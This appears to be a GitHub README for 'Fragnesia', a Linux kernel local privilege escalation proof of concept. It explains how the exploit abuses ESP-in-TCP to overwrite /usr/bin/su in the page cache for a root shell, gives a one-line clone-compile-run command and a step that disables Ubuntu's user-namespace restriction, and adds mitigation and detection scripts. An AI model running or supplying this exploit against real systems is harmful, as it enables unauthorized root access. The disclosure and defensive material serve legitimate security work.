pocs/fragnesia at main · v12-security/pocs · GitHub
Fragnesia
Abstract
(Demo video: vuln.mp4)
Fragnesia is a universal Linux local privilege escalation exploit, discovered using V12 by William Bowling and the V12 team. Fragnesia belongs to the Dirty Frag vulnerability class. It is a separate bug in ESP/XFRM from dirtyfrag and has received its own patch; however, it sits on the same attack surface, and the mitigation is the same as for dirtyfrag.
It abuses a logic bug in the Linux XFRM ESP-in-TCP subsystem to achieve arbitrary byte writes into the kernel page cache of read-only files, without requiring any race condition.
The technique extends the page-cache write bug class that includes Dirty Pipe: when a TCP socket transitions to espintcp ULP mode after data has already been spliced from a file into the receive queue, the kernel processes the queued file pages as ESP ciphertext. The AES-GCM keystream byte at counter block position 2, byte 0 is XORed directly into the cached file page. By selecting the IV nonce to produce a desired keystream byte, any target byte in the file can be set to any value, one byte per trigger invocation.
The exploit builds a 256-entry lookup table mapping each possible keystream byte to its corresponding nonce, then iterates over a payload, firing the splice/ULP trigger for each byte that needs changing. It writes a small position-independent ELF stub (setresuid/setresgid/execve /bin/sh) over the first 192 bytes of /usr/bin/su in the page cache, then calls execve("/usr/bin/su") to obtain a root shell. The page-cache modification is not written back to disk; the on-disk binary is untouched.
"Fragnesia"?
Yes, because the core bug is that the skb "forgets" that a frag is shared during coalescing.
Exploitation
One-line special:
git clone https://github.com/v12-security/pocs.git && cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
Ubuntu note: AppArmor restricts unprivileged user namespaces by default. You must first run:
sudo sysctl -w kernel.apparmor_restrict_unprivileged_userns=0
You can chain other bugs to bypass this requirement, but that is out of scope for this vulnerability.
The exploit targets /usr/bin/su directly. On success it drops into a root shell.
Critical Cleanup Warning
After the exploit runs, /usr/bin/su in the page cache contains the injected stub. Any subsequent execution of su will re-spawn a shell until the page is evicted. Drop the cache (as root) or reboot before leaving the machine:
echo 1 | tee /proc/sys/vm/drop_caches
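Added example, not part of the v12-security/pocs repository: a POSIX shell check for exactly the situation this warning describes. Because the modification lives only in the page cache while the on-disk binary is untouched, hashing the file once through the page cache (what execve sees) and once with an O_DIRECT read that bypasses it exposes the mismatch. Function names are this example's own; it assumes GNU coreutils (dd with iflag=direct and status=none, sha256sum) and a filesystem that supports O_DIRECT, and it reports "unknown" rather than "clean" when that assumption fails.

```shell
#!/bin/sh
# Added example (not from the v12-security/pocs repository).
# Detect a page-cache-only modification of a binary by hashing the cached copy
# and the on-disk copy separately. Assumes GNU coreutils; helper names are
# this example's own.

# SHA-256 of the file as the kernel serves it from the page cache.
cached_sha256() {
    sha256sum "$1" | cut -d' ' -f1
}

# SHA-256 of the file read with O_DIRECT, which bypasses the page cache and
# reaches the on-disk blocks. Returns 1 (prints nothing) if the filesystem
# refuses O_DIRECT, e.g. tmpfs, so callers can tell "unsupported" from "differs".
direct_sha256() {
    # Probe first: dd's exit status would be hidden behind the pipe below.
    dd if="$1" bs=4096 iflag=direct count=1 status=none >/dev/null 2>&1 || return 1
    dd if="$1" bs=4096 iflag=direct status=none 2>/dev/null | sha256sum | cut -d' ' -f1
}

# Exit status: 0 = cached copy differs from disk (tampered),
#              1 = both hashes match, 2 = could not check.
page_cache_tampered() {
    cached=$(cached_sha256 "$1") || return 2
    disk=$(direct_sha256 "$1") || return 2
    [ "$cached" != "$disk" ]
}

# Evict cached pages so the genuine on-disk binary is read back in.
# Mirrors the README's cleanup step; requires root.
evict_page_cache() {
    sync
    echo 1 > /proc/sys/vm/drop_caches
}

# check_su [path]: report on the README's target (default /usr/bin/su).
check_su() {
    target="${1:-/usr/bin/su}"
    page_cache_tampered "$target"
    case $? in
        0) echo "ALERT: page-cache copy of $target differs from disk; evict it (evict_page_cache) or reboot"
           return 1 ;;
        1) echo "OK: page-cache copy of $target matches disk"
           return 0 ;;
        *) echo "UNKNOWN: O_DIRECT read of $target failed; verify against the package manager's recorded hash instead"
           return 2 ;;
    esac
}

# Run the check when executed directly with a path argument:
#   sh su_cache_check.sh /usr/bin/su
if [ $# -gt 0 ]; then
    check_su "$1"
fi
```

The O_DIRECT read is the important part: any tool that reads the file normally (dpkg -V, sha256sum, a file-integrity agent) is served the same tampered pages as execve, so it sees a changed file but cannot tell you whether the disk is still clean. Comparing both views answers that question, and a clean disk means eviction is sufficient remediation.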
Mitigation
Same as dirtyfrag.
rmmod esp4 esp6 rxrpc
printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > /etc/modprobe.d/dirtyfrag.conf
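Added example, not part of the v12-security/pocs repository: a POSIX shell script that applies the two mitigation commands above and then verifies them, together with the Ubuntu user-namespace restriction that the exploitation notes say must be switched off for the exploit to work. The verification functions take their input as text so they can be run against live /proc/modules and modprobe.d content or against samples; all function names, and the check/apply sub-commands, are this example's own.

```shell
#!/bin/sh
# Added example (not from the v12-security/pocs repository): apply and verify
# the dirtyfrag/fragnesia mitigation from the README (unload esp4/esp6/rxrpc and
# block reloading via modprobe.d) and the Ubuntu user-namespace restriction the
# README says the exploit needs disabled. Helper names are this example's own.

MODS="esp4 esp6 rxrpc"
CONF=/etc/modprobe.d/dirtyfrag.conf

# modules_absent <text of /proc/modules> <mod>...
# Returns 0 when none of the modules is loaded (each line starts "<name> ").
modules_absent() {
    list=$1; shift
    for m in "$@"; do
        if printf '%s\n' "$list" | grep -q "^$m "; then
            return 1
        fi
    done
    return 0
}

# install_blocked <text of modprobe.d conf> <mod>...
# Returns 0 when every module has an "install <mod> /bin/false" line, so
# modprobe (including autoload when an XFRM SA is installed) refuses to load it.
install_blocked() {
    conf=$1; shift
    for m in "$@"; do
        printf '%s\n' "$conf" | grep -Eq "^[[:space:]]*install[[:space:]]+$m[[:space:]]+/bin/false" || return 1
    done
    return 0
}

# userns_restricted <sysctl value>
# Returns 0 when kernel.apparmor_restrict_unprivileged_userns is 1 (Ubuntu's
# default), which blocks the unshare(CLONE_NEWUSER|CLONE_NEWNET) step on its own.
userns_restricted() {
    [ "$1" = "1" ]
}

# apply_mitigation: the README's commands, run per module so that one module
# that is not loaded does not stop the rest. Requires root.
apply_mitigation() {
    for m in $MODS; do
        rmmod "$m" 2>/dev/null || true
    done
    printf 'install esp4 /bin/false\ninstall esp6 /bin/false\ninstall rxrpc /bin/false\n' > "$CONF"
}

# check_live: verify the running system; exit status 0 means every check passed.
check_live() {
    rc=0
    mods=$(cat /proc/modules 2>/dev/null || true)
    conf=$(cat "$CONF" 2>/dev/null || true)
    userns=$(cat /proc/sys/kernel/apparmor_restrict_unprivileged_userns 2>/dev/null || echo absent)

    if modules_absent "$mods" $MODS; then echo "OK: none of $MODS loaded"
    else echo "FAIL: one of $MODS is loaded"; rc=1; fi
    if install_blocked "$conf" $MODS; then echo "OK: $CONF blocks reloading"
    else echo "FAIL: $CONF missing or incomplete"; rc=1; fi
    if userns_restricted "$userns"; then echo "OK: unprivileged user namespaces restricted"
    else echo "WARN: apparmor_restrict_unprivileged_userns=$userns (non-Ubuntu kernels lack this knob)"; fi
    return $rc
}

# Usage:  sh mitigation.sh apply   (as root)   |   sh mitigation.sh check
case "${1:-}" in
    apply) apply_mitigation && check_live ;;
    check) check_live ;;
esac
```

The modprobe.d line matters as much as the rmmod: installing an XFRM security association autoloads the ESP modules, so without the "install ... /bin/false" entries an unprivileged user inside a network namespace can bring them straight back. The user-namespace check is reported as a warning rather than a failure because it is Ubuntu-specific and is a second layer, not the fix.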
Affected Versions
All versions affected by dirtyfrag are affected.
Any version without this patch: https://lists.openwall.net/netdev/2026/05/13/79, i.e. Linux kernels from before May 13, 2026.
Confirmed working on Linux localhost 6.8.0-111-generic #111-Ubuntu SMP PREEMPT_DYNAMIC Sat Apr 11 23:16:02 UTC 2026 x86_64 x86_64 x86_64 GNU/Linux (a VPS purchased from Linode).
How It Works
User + network namespace setup. The exploit calls unshare(CLONE_NEWUSER | CLONE_NEWNET) to obtain a namespace where it holds CAP_NET_ADMIN without any real privileges on the host.
XFRM SA installation. Inside the network namespace, a transport-mode ESP-in-TCP security association is installed via NETLINK_XFRM using AES-128-GCM with a known key and SPI 0x100.
Keystream table. The 16-byte AES-GCM counter block for sequence position 2 is [salt || IV || 00000002]. Encrypting it under the known key yields a...